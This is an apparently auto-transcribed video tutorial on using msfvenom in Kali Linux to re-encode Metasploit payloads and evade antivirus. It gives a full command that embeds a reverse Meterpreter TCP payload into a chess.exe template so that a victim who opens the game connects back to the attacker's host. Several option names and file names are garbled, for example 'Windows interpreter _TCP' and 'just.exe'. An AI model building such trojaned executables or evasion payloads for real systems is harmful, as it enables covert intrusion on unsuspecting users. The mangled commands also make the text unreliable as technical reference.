Welcome, in this video we will see msfvenom in Kali Linux. Eluding and evading antivirus software and intrusion detection system is one of the most critical tasks of the hacker. As soon as new exploit is developed and discovered, the AV and IDS developer build a signature for the attack, which is then likely to be detected and prevented. To re-encode a payload in Metasploit, you had to pipe msf payload through msf command, which will be shown in this tutorial. Recently, Rapid7, the developers of Metasploit, introduced a new command that takes the place of clunky combination of msf payload and msf encode to streamline the process of re-encoding a Metasploit payload. Let's take a look at it in this guide. First, re-encoding payloads. Re-encoding a Metasploit payload used to work for evading AV and other security devices, but the people who developed AV software are not dumb. They have now found ways to detect even a re-encoded payload from Metasploit. Let's open up terminal. You can do that by simply typing msf console, or you can use the graphical user interface. For that, go to Applications, Kali Linux, Top 10 Security Tools, Metasploit Framework. Type msf console, see the msfvenom options. Now at the prompt, type msfvenom to pull up its help page. Let's take a look at some of the most important options in this list. -P designates Metasploit payload we want to use. -E designates the encoder we want to use. -A designates the architecture we want to use, that is x86. -S designates the maximum size of the payload. -I designates the number of iterations with which to encode the payload. -X designates a custom executable file to use as a template. Now list the encoders. Encoders are various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes. Type msfvenom -L encoders. Metasploit will then list all of the available encoder with each ranks and description. You can see the name of encoders and the rank and description. The rank varies from good, manual, low, normal, excellent, great, and so on. For echo command encoder. For generic shell variable substitution command encoder, and so on. Note that shikata_ga._nai is ranked excellent. Now view the payload options. We can use msfvenom to check options that we need to set for any payload similar to show option in Metasploit console. If you want to check the option for Windows interpreter _TCP payload, type msfvenom -p Windows interpreter _TCP -0. If we want to work with this payload, we now know what options we need to set in the msfvenom command. Create a custom Windows executable. Now let's create a custom Windows executable with a custom template. Although we cannot create a payload without a custom template, you have a better chance of getting past security devices and AV if you use a custom template. In this case, we'll use a chess game named chess.exe. The idea here is that we will embed interpreter payload into the chess game, and then when the victim opens the game to play chess, it will open a interpreter session on our system. To create a malicious executable with Windows interpreter -TCP embedded inside, type msfvenom -p Windows interpreter _TCP lhost is equal to 192.168.154.130, lport is equal to 6996, -x user share chess.exe, -e x86 shikata_ga_nai, -i 200, -f exe chess.exe, -p Windows interpreter _TCP designates the payload we want to embed. L-port designates the port we want to listen on. -X designates the template we want to use and the path to it. -E x86 Shikata GANAI designates the encoder we want to use. -I200 represents the number of iteration. -F exe designates we want to create an executable. Just.exe designates the name of the file created. When the victim clicks on the just.exe file, the Meterpreter payload will be activated and will look to make connection back to your system, that is lhost. For connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection. So that's it in this video on msfvenom. Thank you for watching this video.